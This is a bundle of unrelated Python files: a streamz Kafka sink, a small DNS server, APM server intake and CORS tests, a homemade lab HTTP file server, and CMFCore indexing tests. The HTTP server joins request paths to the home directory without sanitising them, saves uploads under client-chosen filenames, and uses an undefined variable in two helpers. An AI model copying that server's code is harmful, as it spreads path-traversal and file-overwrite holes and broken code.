messages are pushed. Responses from Kafka are pushed downstream.
Parameters
----------
topic : string
The topic which to write
producer_config : dict
Settings to set up the stream, see
https://docs.confluent.io/current/clients/confluent-kafka-python/#configuration
https://github.com/edenhill/librdkafka/blob/master/CONFIGURATION.md
Examples:
bootstrap.servers: Connection string (host:port) to Kafka
Examples
--------
>>> from streamz import Stream
>>> ARGS = {'bootstrap.servers': 'localhost:9092'}
>>> source = Stream()
>>> kafka = source.map(lambda x: str(x)).to_kafka('test', ARGS)
<to_kafka>
>>> for i in range(10):
... source.emit(i)
>>> kafka.flush()
"""
def __init__(self, upstream, topic, producer_config, **kwargs):
import confluent_kafka as ck
self.topic = topic
self.producer = ck.Producer(producer_config)
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
self.stopped = False
self.polltime = 0.2
self.loop.add_callback(self.poll)
self.futures = []
@gen.coroutine
def poll(self):
while not self.stopped:
# executes callbacks for any delivered data, in this thread
# if no messages were sent, nothing happens
self.producer.poll(0)
yield gen.sleep(self.polltime)
def update(self, x, who=None, metadata=None):
future = gen.Future()
self.futures.append(future)
@gen.coroutine
def _():
while True:
try:
# this runs asynchronously, in C-K's thread
self.producer.produce(self.topic, x, callback=self.cb)
return
except BufferError:
yield gen.sleep(self.polltime)
except Exception as e:
future.set_exception(e)
return
self.loop.add_callback(_)
return future
@gen.coroutine
def cb(self, err, msg):
future = self.futures.pop(0)
if msg is not None and msg.value() is not None:
future.set_result(None)
yield self._emit(msg.value())
else:
future.set_exception(err or msg.error())
def flush(self, timeout=-1):
self.producer.flush(timeout)
def sync(loop, func, *args, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# This was taken from distrbuted/utils.py
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if PollIOLoop and ((isinstance(loop, PollIOLoop) and getattr(loop, '_closing', False))
or (hasattr(loop, 'asyncio_loop') and loop.asyncio_loop._closed)):
raise RuntimeError("IOLoop is closed")
timeout = kwargs.pop('callback_timeout', None)
e = threading.Event()
main_tid = get_thread_identity()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == get_thread_identity():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if timeout is not None:
future = gen.with_timeout(timedelta(seconds=timeout), future)
result[0] = yield future
except Exception:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if timeout is not None:
if not e.wait(timeout):
raise gen.TimeoutError("timed out after %s s." % (timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
six.reraise(*error[0])
else:
return result[0]
|
uDNS.py
|
# coding=utf-8
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import sys
import time
import threading
import traceback
import socketserver
import argparse
import codecs
import json
from dnslib import *
TTL = 60 * 5 # completely arbitrary TTL value
round_robin = False
default_records = list()
records = dict()
class DomainName(str):
def __getattr__(self, item):
return DomainName(item + '.' + self)
class BaseRequestHandler(socketserver.BaseRequestHandler):
def get_data(self):
raise NotImplementedError
def send_data(self, data):
raise NotImplementedError
def handle(self):
now = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')
print("\n\n%s request %s (%s %s):" % (self.__class__.__name__[:3], now, self.client_address[0],
self.client_address[1]))
try:
data = self.get_data()
self.send_data(dns_response(data))
except Exception:
traceback.print_exc(file=sys.stderr)
class TCPRequestHandler(BaseRequestHandler):
def get_data(self):
data = self.request.recv(8192).strip()
sz = int(codecs.encode(data[:2], 'hex'), 16)
if sz < len(data) - 2:
raise Exception("Wrong size of TCP packet")
elif sz > len(data) - 2:
raise Exception("Too big TCP packet")
return data[2:]
def send_data(self, data):
sz = codecs.decode(hex(len(data))[2:].zfill(4), 'hex')
return self.request.sendall(sz + data)
class UDPRequestHandler(BaseRequestHandler):
def get_data(self):
return self.request[0].strip()
def send_data(self, data):
return self.request[1].sendto(data, self.client_address)
def build_domain_mappings(path):
with open(path) as f:
zone_file = json.load(f)
for domain in zone_file['mappings']:
for d in iter(domain.keys()):
# this loop only runs once, kind of a hack to access the only key in the dict
domain_name = DomainName(d)
print("Domain name:", domain_name)
records[domain_name] = [A(x) for x in domain[domain_name]]
print(records[domain_name])
if 'otherwise' in zone_file:
default_records.extend([A(d) for d in zone_file['otherwise']])
def add_authoritative_records(reply, domain):
# ns1 and ns1 are hardcoded in, change if necessary
reply.add_auth(RR(rname=domain, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=NS(domain.ns1)))
reply.add_auth(RR(rname=domain, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=NS(domain.ns2)))
def dns_response(data):
''' dns_response takes in the raw bytes from the socket and does all the logic behind what
RRs get returned as the response '''
global default_records, records, TTL, round_robin
request = DNSRecord.parse(data)
print(request)
reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
qtype = request.q.qtype
qt = QTYPE[qtype]
found_specific = False
# first look for a specific mapping
for domain, rrs in records.items():
if domain == qn or qn.endswith('.' + domain):
# we are the authoritative name server for this domain and all subdomains
for rdata in rrs:
# only include requested record types (ie. A, MX, etc)
rqt = rdata.__class__.__name__
if qt in ['*', rqt]:
found_specific = True
reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, str(rqt)), rclass=1, ttl=TTL, rdata=rdata))
# rotate the A entries if round robin is on
if round_robin:
a_records = [x for x in rrs if type(x) == A]
records[domain] = a_records[1:] + a_records[:1] # rotate list
break
# else if a specific mapping is not found, return default A-records
if not found_specific:
for a in default_records:
found_specific = True
reply.add_answer(RR(rname=qname, rtype=QTYPE.A, rclass=1, ttl=TTL, rdata=a))
if round_robin:
default_records = default_records[1:] + default_records[:1]
if not found_specific:
reply.header.set_rcode(3)
print("---- Reply: ----\n", reply)
return reply.pack()
if __name__ == '__main__':
# handle cmd line args
parser = argparse.ArgumentParser()
parser.add_argument("ip_addr", type=str, help="Interface", default="127.0.0.1")
parser.add_argument("port", type=int, help="port uDNS should listen on")
parser.add_argument("zone_file", help="path to zone file")
parser.add_argument("--rr", action='store_true',
help='round robin load balances if multiple IP addresses are present for 1 domain')
args = parser.parse_args()
if args.rr:
round_robin = True
build_domain_mappings(args.zone_file)
servers = [
socketserver.ThreadingUDPServer((args.ip_addr, args.port), UDPRequestHandler),
socketserver.ThreadingTCPServer((args.ip_addr, args.port), TCPRequestHandler),
]
print("Starting DNS...")
for s in servers:
thread = threading.Thread(target=s.serve_forever) # that thread will start one more thread for each request
thread.daemon = True # exit the server thread when the main thread terminates
thread.start()
try:
while 1:
time.sleep(1)
sys.stderr.flush()
sys.stdout.flush()
except KeyboardInterrupt:
pass
finally:
for s in servers:
s.shutdown()
|
test_requests.py
|
from collections import defaultdict
import gzip
import requests
import threading
import time
import zlib
from io import BytesIO
from apmserver import ServerBaseTest, ClientSideBaseTest, CorsBaseTest
class Test(ServerBaseTest):
def test_ok(self):
r = self.request_intake()
assert r.status_code == 202, r.status_code
assert r.text == "", r.text
def test_ok_verbose(self):
r = self.request_intake(url='http://localhost:8200/intake/v2/events?verbose')
assert r.status_code == 202, r.status_code
assert r.json() == {"accepted": 4}, r.json()
def test_empty(self):
r = self.request_intake(data={})
assert r.status_code == 400, r.status_code
def test_not_existent(self):
r = self.request_intake(url='http://localhost:8200/transactionX')
assert r.status_code == 404, r.status_code
def test_method_not_allowed(self):
r = requests.get(self.intake_url)
assert r.status_code == 400, r.status_code
def test_bad_json(self):
r = self.request_intake(data="invalid content")
assert r.status_code == 400, r.status_code
def test_validation_fail(self):
data = self.get_event_payload(name="invalid-event.ndjson")
r = self.request_intake(data=data)
assert r.status_code == 400, r.status_code
assert "error validating JSON document against schema" in r.text, r.text
def test_rum_default_disabled(self):
r = self.request_intake(url='http://localhost:8200/intake/v2/rum/events')
assert r.status_code == 403, r.status_code
def test_healthcheck(self):
healtcheck_url = 'http://localhost:8200/'
r = requests.get(healtcheck_url)
assert r.status_code == 200, r.status_code
def test_gzip(self):
events = self.get_event_payload().encode("utf-8")
out = BytesIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(events)
r = requests.post(self.intake_url, data=out.getvalue(),
headers={'Content-Encoding': 'gzip', 'Content-Type': 'application/x-ndjson'})
assert r.status_code == 202, r.status_code
def test_deflate(self):
events = self.get_event_payload().encode("utf-8")
compressed_data = zlib.compress(events)
r = requests.post(self.intake_url, data=compressed_data,
headers={'Content-Encoding': 'deflate', 'Content-Type': 'application/x-ndjson'})
assert r.status_code == 202, r.status_code
def test_gzip_error(self):
events = self.get_event_payload()
r = requests.post(self.intake_url, json=events,
headers={'Content-Encoding': 'gzip', 'Content-Type': 'application/x-ndjson'})
assert r.status_code == 400, r.status_code
def test_deflate_error(self):
events = self.get_event_payload()
r = requests.post(self.intake_url, data=events,
headers={'Content-Encoding': 'deflate', 'Content-Type': 'application/x-ndjson'})
assert r.status_code == 400, r.status_code
def test_expvar_default(self):
"""expvar should not be exposed by default"""
r = requests.get(self.expvar_url)
assert r.status_code == 404, r.status_code
class ClientSideTest(ClientSideBaseTest):
def test_ok(self):
r = self.request_intake()
assert r.status_code == 202, r.status_code
def test_sourcemap_upload_fail(self):
path = self._beat_path_join(
'testdata',
'sourcemap',
'bundle.js.map')
file = open(path)
r = requests.post(self.sourcemap_url,
files={'sourcemap': file})
assert r.status_code == 400, r.status_code
class CorsTest(CorsBaseTest):
def test_ok(self):
r = self.request_intake(headers={'Origin': 'http://www.elastic.co', 'content-type': 'application/x-ndjson'})
assert r.headers['Access-Control-Allow-Origin'] == 'http://www.elastic.co', r.headers
assert r.status_code == 202, r.status_code
def test_bad_origin(self):
# origin must include protocol and match exactly the allowed origin
r = self.request_intake(headers={'Origin': 'www.elastic.co', 'content-type': 'application/x-ndjson'})
assert r.status_code == 403, r.status_code
def test_no_origin(self):
r = self.request_intake()
assert r.status_code == 403, r.status_code
def test_preflight(self):
r = requests.options(self.intake_url,
data=self.get_event_payload(),
headers={'Origin': 'http://www.elastic.co',
'Access-Control-Request-Method': 'POST',
'Access-Control-Request-Headers': 'Content-Type, Content-Encoding'})
assert r.status_code == 200, r.status_code
assert r.headers['Access-Control-Allow-Origin'] == 'http://www.elastic.co', r.headers
assert r.headers['Access-Control-Allow-Headers'] == 'Content-Type, Content-Encoding, Accept', r.headers
assert r.headers['Access-Control-Allow-Methods'] == 'POST, OPTIONS', r.headers
assert r.headers['Vary'] == 'Origin', r.headers
assert r.headers['Content-Length'] == '0', r.headers
assert r.headers['Access-Control-Max-Age'] == '3600', r.headers
def test_preflight_bad_headers(self):
for h in [{'Access-Control-Request-Method': 'POST'}, {'Origin': 'www.elastic.co'}]:
r = requests.options(self.intake_url,
json=self.get_event_payload(),
headers=h)
assert r.status_code == 200, r.status_code
assert 'Access-Control-Allow-Origin' not in r.headers.keys(), r.headers
assert r.headers['Access-Control-Allow-Headers'] == 'Content-Type, Content-Encoding, Accept', r.headers
assert r.headers['Access-Control-Allow-Methods'] == 'POST, OPTIONS', r.headers
class RateLimitTest(ClientSideBaseTest):
def fire_events(self, data_file, iterations, split_ips=False):
events = self.get_event_payload(name=data_file)
threads = []
codes = defaultdict(int)
def fire(x):
ip = '10.11.12.13'
if split_ips and x % 2:
ip = '10.11.12.14'
r = self.request_intake(data=events,
headers={'content-type': 'application/x-ndjson', 'X-Forwarded-For': ip})
codes[r.status_code] += 1
return r.status_code
# rate limit hit, because every event in request is counted
for x in range(iterations):
threads.append(threading.Thread(target=fire, args=(x,)))
for t in threads:
t.start()
time.sleep(0.01)
for t in threads:
t.join()
return codes
# limit: 16, burst_multiplier: 3, burst: 48
def test_rate_limit(self):
# all requests from the same ip
# 19 events, batch size 10 => 20+1 events per requ
codes = self.fire_events("ratelimit.ndjson", 3)
assert set(codes.keys()) == set([202]), codes
def test_rate_limit_hit(self):
# all requests from the same ip
codes = self.fire_events("ratelimit.ndjson", 5)
assert set(codes.keys()) == set([202, 429]), codes
assert codes[429] == 2, codes
assert codes[202] == 3, codes
def test_rate_limit_small_hit(self):
# all requests from the same ip
# 4 events, batch size 10 => 10+1 events per requ
codes = self.fire_events("events.ndjson", 8)
assert set(codes.keys()) == set([202, 429]), codes
assert codes[429] == 3, codes
assert codes[202] == 5, codes
def test_rate_limit_only_metadata(self):
# all requests from the same ip
# no events, batch size 10 => 10+1 events per requ
codes = self.fire_events("only-metadata.ndjson", 8)
assert set(codes.keys()) == set([202, 429]), codes
assert codes[429] == 3, codes
assert codes[202] == 5, codes
def test_multiple_ips_rate_limit(self):
# requests from 2 different ips
codes = self.fire_events("ratelimit.ndjson", 6, True)
assert set(codes.keys()) == set([202]), codes
def test_multiple_ips_rate_limit_hit(self):
# requests from 2 different ips
codes = self.fire_events("ratelimit.ndjson", 10, True)
assert set(codes.keys()) == set([202, 429]), codes
assert codes[429] == 4, codes
assert codes[202] == 6, codes
|
http_server.py
|
'''
author: g-tmp
base on python3/http.server
'''
import os
import io
import sys
import socket
import html
import urllib.parse
import mimetypes
import time
import threading
class File(object):
def get_filesize(self,file):
size_unit = ['b','K','M','G','T']
try:
size = os.path.getsize(s)
except OSError as e:
raise e
i = 0
while size/1000 >= 1:
size = float(size) / 1000
i += 1
return '%.1f %s' % (size , size_unit[i])
# file last modify time
def get_filemtime(self,file):
stime = time.localtime(os.path.getmtime(s))
ftime = time.strftime('%Y-%m-%d %H:%M:%S',stime)
return ftime
# OK = 200
# NOT_FOUND = 404
# MOVER_PERMANENTLY = 301
class HTTPRequestHandler(object):
"""
"""
def __init__(self):
self.HOME = os.environ['HOME']
def parse_request(self,request):
status_line = request.split('\r\n')[0]
method = status_line.split()[0]
path = urllib.parse.unquote(status_line.split()[1])
return (method,path)
def make_header(self,state_code,path=None,body_length=0):
server = "XD"
date = ''
if state_code == 200:
if path is None:
header = 'HTTP/1.1 200 OK\r\nContent-Type: %s\r\nServer: %s\r\n\r\n' % ('text/html',server)
return header
if os.path.isdir(path) and not path.rstrip().endswith('/'):
return self.make_header(301,path)
content_type = self.guess_type(path)
header = 'HTTP/1.1 200 OK\r\nContent-Type: %s\r\nContent-Length: %d\r\nServer: %s\r\n\r\n' % (content_type,body_length,server)
elif state_code == 404:
header = 'HTTP/1.1 404 Not Found\r\nContent-Type: text/html;charset=utf-8\r\nContent-Length: %d\r\nServer: %s\r\nConnection: close\r\n\r\n' % (body_length , server)
elif state_code == 301:
if not path.rstrip().endswith('/'):
location = path + '/'
header = 'HTTP/1.1 301 Moved Permanently\r\nLocation: %s\r\nServer: %s\r\n\r\n' % (location,server)
else:
return None
return header
def list_directory(self,path):
'''
path is REAL path
path is a file return None
or
path is a diractory list its files and return a fd
'''
try:
lists = os.listdir(path)
except OSError as e:
# path is not a diractory
return None
os.chdir(path) # change directory for upload files
logic_path = path.replace(self.HOME,'')
r = []
enc = sys.getfilesystemencoding()
title = 'Directory listing for %s ' % logic_path
r.append('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">')
r.append('<html>\n<head>')
r.append('<meta http-equiv="Content-Type" content="text/html; charset=%s">' % enc)
r.append('<title>%s</title>\n</head>' % logic_path)
r.append('<body>\n<h1>%s</h1>' % title)
r.append('<form method="POST" enctype="multipart/form-data">')
# r.append('<input type="text" name="p1" required="required"> >>')
r.append('<input type="file" name="file" > >>')
r.append('<button type="submit">Upload</button></form>')
r.append('<hr>\n<ul>')
try:
r.append('<a href="%s">Parent Directory</a>' % logic_path[0:logic_path[0:-1].rindex('/')+1])
except Exception as e:
r.append('/')
lists.sort(key=lambda a:a.lower())
for name in lists:
fullname = os.path.join(path,name)
displayname = linkname = name
if os.path.isdir(fullname):
displayname = name + "/"
linkname = name + "/"
if os.path.islink(fullname):
displayname = name + "@"
r.append('<li><a href="%s">%s</a></li>' %
(urllib.parse.quote(linkname,errors='surrogatepass'), # convert the characters in url # , space , ? to %xx escape
html.escape(displayname,quote='false') ) # Convert the characters &, < and > in string s to HTML-safe sequences.
)
r.append('</ul>\n<hr>\n</body>\n</html>\n')
encode = '\n'.join(r).encode(enc) # encode WHY?
# f = io.BytesIO()
# f.write(encode)
# f.seek(0)
return encode # bytes-like object
def translate_path(self,path):
# path = path.split('?',1)[0]
# path = path.split('#',1)[0]
real_path = self.HOME + path
# print('real_path ',real_path)
return real_path
def guess_type(self,path):
if os.path.isdir(path):
return "text/html;charset=utf-8"
content_type = mimetypes.guess_type(path)[0]
return content_type
def read_file(self,path):
buffer = []
fd = None
try:
fd = open(path,'rb')
# return fd.read()
while True:
line = fd.read(4096)
if not line :
break
buffer.append(line)
buffer = b''.join(buffer)
return buffer # byte array
# no such file
except IOError as e:
raise e
finally:
if fd:
fd.close()
def do_GET(self,connection_socket,path):
html = self.list_directory(path)
response = ''
if html == None:
# is a file
size = os.path.getsize(path)
outputdata = self.read_file(path)
header = self.make_header(200,path,size)
response = header.encode() + outputdata
else:
# is a directory
header = self.make_header(200,path,len(html))
response = header.encode() + html
self.send_response(connection_socket,response)
def do_POST(self,connection_socket,request):
content_len = int(request.split('Content-Length: ')[1].split('\r\n')[0])
body = connection_socket.receive_upload(content_len)
# print("len : "+len(body))
# print(body)
connection_socket.upload(body)
header = self.make_header(200)
html = '''\
<TITLE>Upload page for TCP Ethereal Lab</TITLE>
<body bgcolor="#FFFFFF">
<p><font face="Arial, Helvetica, sans-serif" size="4"> Congratulations! <br> </font>
<P><font face="Arial, Helvetica, sans-serif"> You've now transferred a copy of alice.txt from your computer to
XD. You should now stop Wireshark packet capture. It's time to start analyzing the captured Wireshark packets! </font>
</FORM>
'''
response = header.encode('utf-8') + html.encode('utf-8')
self.send_response(connection_socket,response)
def send_response(self,connection_socket,response):
connection_socket.send(response)
class MySocket(object):
"""
- coded for clarity, not efficiency
"""
def __init__(self, sock = None):
if sock is None:
self.__socket = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
else:
self.__socket = sock
def server_bind(self,host='',port=8000):
self.__socket.bind((host,port))
self.__socket.listen(5)
print("server listening %d <3" % port)
def server_accept(self):
return self.__socket.accept()
def getaddress(self):
self.__socket.getsockname()
def send(self,msg):
# totalsent = 0
# while totalsent < MSGLEN:
# sent = self.__socket.send(msg[bytes_sent:])
# if sent == 0:
# raise RuntimeError("socket connection broken")
# bytes_sent += sent
return self.__socket.send(msg)
def receive(self):
# chunks = []
# totalrecd = 0 # have received how many bytes
# while totalrecd < MSGLEN:
# chunk = self.__socket.recv(min(MSGLEN - totalrecd , 2048))
# if chunk == b'':
# raise RuntimeError("socket connection broken")
# chunks.append(chunk)
# totalrecd += len(chunk)
# return b''.join(chunks)
return self.__socket.recv(4096)
def receive_upload(self,msglen):
chunks = []
bytes_recvd = 0
while bytes_recvd < msglen:
chunk = self.__socket.recv(min(msglen - bytes_recvd, 16 * 1024))
if chunk == b'':
raise RuntimeError("socket connection broken")
bytes_recvd += len(chunk)
chunks.append(chunk)
return b''.join(chunks)
def upload(self,body):
part = body.split(b"\r\n\r\n")
part_fields = part[0].split(b"\r\n")
WebKitFormBoundary = part_fields[0]
content_disposition = part_fields[1].split(b' ')
filename = str(part_fields[1].split(b'; ')[-1].split(b'=')[-1].replace(b'"',b'')).replace("'","")
content_type = part_fields[2].split(b"Content-Type: ")[-1]
# print(part_fields[1])
data = part[-1].split(WebKitFormBoundary)[0]
# print(type(filename),filename)
try:
with open(filename,'wb') as fd:
fd.write(data)
except IOError as e:
raise e
def close(self):
if self.__socket:
self.__socket.close()
def shutdown(self):
self.__socket.shutdown(socket.SHUT_RDWR)
request_handler = HTTPRequestHandler()
def run(connection_socket,addr):
connection_socket = MySocket(connection_socket)
try:
# while True:
aa = connection_socket.receive();
# print(aa)
request = aa.decode('utf-8')
(method , logic_path ) = request_handler.parse_request(request)
real_path = request_handler.translate_path(logic_path)
response = ''
print(method + "\t" + logic_path)
# print(request)
# print(len(request))
if method == "GET":
request_handler.do_GET(connection_socket,real_path)
elif method == "POST":
request_handler.do_POST(connection_socket,request)
except KeyboardInterrupt as e:
print("Keyboard Interrupt")
except IOError as e:
html = '<br /><font color="red" size="7">404 Not Found!</p>'
header = request_handler.make_header(404,body_length=len(html))
response = header.encode() + html.encode()
connection_socket.send(response)
finally:
# print("------- request ------- ")
# print(request)
# connection_socket.shutdown()
connection_socket.close()
def start():
welcome_socket = MySocket()
try:
port = int(sys.argv[1])
welcome_socket.server_bind(port=port)
except IndexError as e:
welcome_socket.server_bind()
while True:
connection_socket,addr = welcome_socket.server_accept()
print(addr)
# connection_socket.settimeout(60)
t = threading.Thread(target=run , args=(connection_socket,addr))
t.start()
welcome_socket.close()
if __name__ == '__main__':
start()
|
test_CatalogIndexing.py
|
# -*- coding: utf-8 -*-
from Acquisition import Implicit
from Products.CMFCore.indexing import getQueue
from Products.CMFCore.indexing import INDEX
from Products.CMFCore.indexing import IndexQueue
from Products.CMFCore.indexing import QueueTM
from Products.CMFCore.indexing import REINDEX
from Products.CMFCore.indexing import UNINDEX
from Products.CMFCore.interfaces import IIndexing
from Products.CMFCore.interfaces import IIndexQueue
from Products.CMFCore.interfaces import IIndexQueueProcessor
from Products.CMFCore.tests.base.dummy import DummyContent
from Products.CMFCore.tests.base.dummy import DummyFolder
from threading import currentThread
from threading import Thread
from time import sleep
from transaction import savepoint, commit, abort
from unittest import TestCase
from zope.component import provideUtility
from zope.interface import implementer
from zope.testing.cleanup import CleanUp
@implementer(IIndexing)
class MockIndexer(object):
def __init__(self):
self.queue = []
def index(self, obj, attributes=None):
self.queue.append((INDEX, obj, attributes))
def reindex(self, obj, attributes=None):
self.queue.append((REINDEX, obj, attributes))
def unindex(self, obj):
self.queue.append((UNINDEX, obj, None))
@implementer(IIndexQueue)
class MockQueue(MockIndexer):
processed = None
def hook(self):
pass
def index(self, obj, attributes=None):
super(MockQueue, self).index(obj, attributes)
self.hook()
def reindex(self, obj, attributes=None, update_metadata=1):
super(MockQueue, self).reindex(obj, attributes)
self.hook()
def unindex(self, obj):
super(MockQueue, self).unindex(obj)
self.hook()
def getState(self):
return list(self.queue) # better return a copy... :)
def setState(self, state):
self.queue = state
def optimize(self):
pass
def process(self):
self.processed = self.queue
self.clear()
return len(self.processed)
def clear(self):
self.queue = []
@implementer(IIndexQueueProcessor)
class MockQueueProcessor(MockQueue):
state = 'unknown'
def begin(self):
self.state = 'started'
def commit(self):
self.state = 'finished'
def abort(self):
self.clear()
self.state = 'aborted'
class QueueTests(CleanUp, TestCase):
def setUp(self):
self.queue = IndexQueue()
def tearDown(self):
self.queue.clear()
def testInterface(self):
self.assertTrue(IIndexQueue.providedBy(self.queue))
def testQueueHook(self):
class CaptainHook(object):
def __init__(self):
self.hooked = 0
def __call__(self):
self.hooked += 1
hook = CaptainHook()
queue = self.queue
queue.setHook(hook)
self.assertEqual(hook.hooked, 0)
queue.index('foo')
queue.reindex('foo')
queue.reindex('bar')
self.assertEqual(len(queue.getState()), 3)
self.assertEqual(hook.hooked, 3)
self.assertEqual(queue.process(), 2)
self.assertEqual(hook.hooked, 3)
def testQueueState(self):
queue = self.queue
queue.index('foo')
self.assertEqual(queue.getState(), [(INDEX, 'foo', None, None)])
state = queue.getState()
queue.reindex('bar')
self.assertEqual(queue.getState(),
[(INDEX, 'foo', None, None),
(REINDEX, 'bar', None, 1)])
queue.setState(state)
self.assertEqual(queue.getState(), [(INDEX, 'foo', None, None)])
self.assertEqual(queue.process(), 1)
def testQueueProcessor(self):
queue = self.queue
proc = MockQueueProcessor()
provideUtility(proc, IIndexQueueProcessor)
queue.index('foo')
self.assertEqual(queue.process(), 1) # also do the processing...
self.assertEqual(queue.getState(), [])
self.assertEqual(proc.getState(), [(INDEX, 'foo', [])])
# the real queue won't update the state...
self.assertEqual(proc.state, 'started')
queue.commit()
self.assertEqual(proc.state, 'finished')
def testMultipleQueueProcessors(self):
queue = self.queue
proc1 = MockQueueProcessor()
proc2 = MockQueueProcessor()
provideUtility(proc1, IIndexQueueProcessor, name='proc1')
provideUtility(proc2, IIndexQueueProcessor, name='proc2')
queue.index('foo')
self.assertEqual(queue.process(), 1) # also do the processing...
self.assertEqual(queue.getState(), [])
self.assertEqual(proc1.getState(), [(INDEX, 'foo', [])])
self.assertEqual(proc2.getState(), [(INDEX, 'foo', [])])
self.assertEqual(proc1.state, 'started') # the real queue won't...
self.assertEqual(proc2.state, 'started') # update the state...
queue.commit()
self.assertEqual(proc1.state, 'finished')
self.assertEqual(proc2.state, 'finished')
def testQueueOperations(self):
queue = self.queue
proc = MockQueueProcessor()
provideUtility(proc, IIndexQueueProcessor)
queue.index('foo')
queue.reindex('foo')
self.assertEqual(queue.process(), 1)
self.assertEqual(queue.getState(), [])
self.assertEqual(proc.getState(), [(INDEX, 'foo', [])])
# the real queue won't update the state
self.assertEqual(proc.state, 'started')
queue.commit()
self.assertEqual(proc.state, 'finished')
def testQueueOptimization(self):
queue = self.queue
queue.index('foo')
queue.reindex('foo')
queue.unindex('foo')
queue.index('foo', 'bar')
queue.optimize()
self.assertEqual(queue.getState(), [(INDEX, 'foo', [], None)])
def testCustomQueueOptimization(self):
def optimize(self):
self.setState([op for op in self.getState() if not
op[0] == UNINDEX])
queue = self.queue
queue.index('foo')
queue.reindex('foo')
queue.unindex('foo')
queue.index('foo', 'bar')
queue.optimize()
self.assertEqual(queue.getState(), [(INDEX, 'foo', [], None)])
queue.clear()
# hook up the custom optimize
orig_optimize = queue.optimize
try:
queue.optimize = optimize
queue.index('foo')
queue.reindex('foo')
queue.unindex('foo')
queue.index('foo', 'bar')
queue.optimize(queue)
self.assertEqual(queue.getState(),
[(INDEX, 'foo', None, None),
(REINDEX, 'foo', None, 1),
(INDEX, 'foo', 'bar', None)])
finally:
queue.optimize = orig_optimize
def testQueueAbortBeforeProcessing(self):
queue = self.queue
proc = MockQueueProcessor()
provideUtility(proc, IIndexQueueProcessor)
queue.index('foo')
queue.reindex('foo')
self.assertNotEqual(queue.getState(), [])
queue.abort()
self.assertEqual(queue.process(), 0) # nothing left...
self.assertEqual(queue.getState(), [])
self.assertEqual(proc.getState(), [])
self.assertEqual(proc.state, 'aborted')
def testQueueAbortAfterProcessing(self):
queue = self.queue
proc = MockQueueProcessor()
provideUtility(proc, IIndexQueueProcessor)
queue.index('foo')
queue.reindex('foo')
self.assertEqual(queue.process(), 1)
self.assertNotEqual(proc.getState(), [])
queue.abort()
self.assertEqual(queue.getState(), [])
self.assertEqual(proc.getState(), [])
self.assertEqual(proc.state, 'aborted')
def testOptimizeQueuexx(self):
queue = self.queue
queue.setState([(REINDEX, 'A', None, 1), (REINDEX, 'A', None, 1)])
queue.optimize()
self.assertEqual(queue.getState(), [(REINDEX, 'A', [], 1)])
queue.setState([(INDEX, 'A', None, 1), (REINDEX, 'A', None, 1)])
queue.optimize()
self.assertEqual(queue.getState(), [(INDEX, 'A', [], 1)])
queue.setState([(INDEX, 'A', None, None), (UNINDEX, 'A', None, None)])
queue.optimize()
self.assertEqual(queue.getState(), [])
queue.setState([(UNINDEX, 'A', None, None), (INDEX, 'A', None, None)])
queue.optimize()
self.assertEqual(queue.getState(), [(REINDEX, 'A', [], None)])
def testOptimizeQueueWithAttributes(self):
queue = self.queue
queue.setState([(REINDEX, 'A', None, 1),
(REINDEX, 'A', ('a', 'b'), 1)])
queue.optimize()
self.assertEqual(queue.getState(), [(REINDEX, 'A', [], 1)])
queue.setState([(REINDEX, 'A', ('a', 'b'), 1),
(REINDEX, 'A', None, 1)])
queue.optimize()
self.assertEqual(queue.getState(), [(REINDEX, 'A', [], 1)])
queue.setState([(REINDEX, 'A', ('a', 'b'), 1),
(REINDEX, 'A', ('b', 'c'), 1)])
queue.optimize()
self.assertEqual(queue.getState(),
[(REINDEX, 'A', ['a', 'b', 'c'], 1)])
queue.setState([(INDEX, 'A', None, None), (REINDEX, 'A', None, 1)])
queue.optimize()
self.assertEqual(queue.getState(), [(INDEX, 'A', [], 1)])
queue.setState([(REINDEX, 'A', ('a', 'b'), 1),
(UNINDEX, 'A', None, None),
(INDEX, 'A', None, 1)])
queue.optimize()
self.assertEqual(queue.getState(), [(REINDEX, 'A', [], 1)])
def testOptimizeQueueSortsByOpcode(self):
queue = self.queue
queue.setState([(INDEX, 'C', None, 1), (UNINDEX, 'B', None, None)])
queue.optimize()
self.assertEqual(queue.getState(),
[(UNINDEX, 'B', [], None), (INDEX, 'C', [], 1)])
queue.setState([(REINDEX, 'A', None, 1), (UNINDEX, 'B', None, None)])
queue.optimize()
self.assertEqual(queue.getState(),
[(UNINDEX, 'B', [], None), (REINDEX, 'A', [], 1)])
queue.setState([(REINDEX, 'A', None, 1),
(UNINDEX, 'B', None, None),
(INDEX, 'C', None, 1)])
queue.optimize()
self.assertEqual(queue.getState(),
[(UNINDEX, 'B', [], None),
(REINDEX, 'A', [], 1),
(INDEX, 'C', [], 1)])
class QueueThreadTests(TestCase):
""" thread tests modeled after zope.thread doctests """
def setUp(self):
self.me = getQueue()
self.assertTrue(IIndexQueue.providedBy(self.me),
'non-queued indexer found')
def tearDown(self):
self.me.clear()
def testLocalQueues(self):
me = self.me # get the queued indexer...
other = []
def runner(): # a callable for the thread to run...
me.reindex('bar')
other[:] = me.getState()
thread = Thread(target=runner) # another thread is created...
thread.start() # and started...
while thread.isAlive():
pass # wait until it's done...
self.assertEqual(other, [(REINDEX, 'bar', None, 1)])
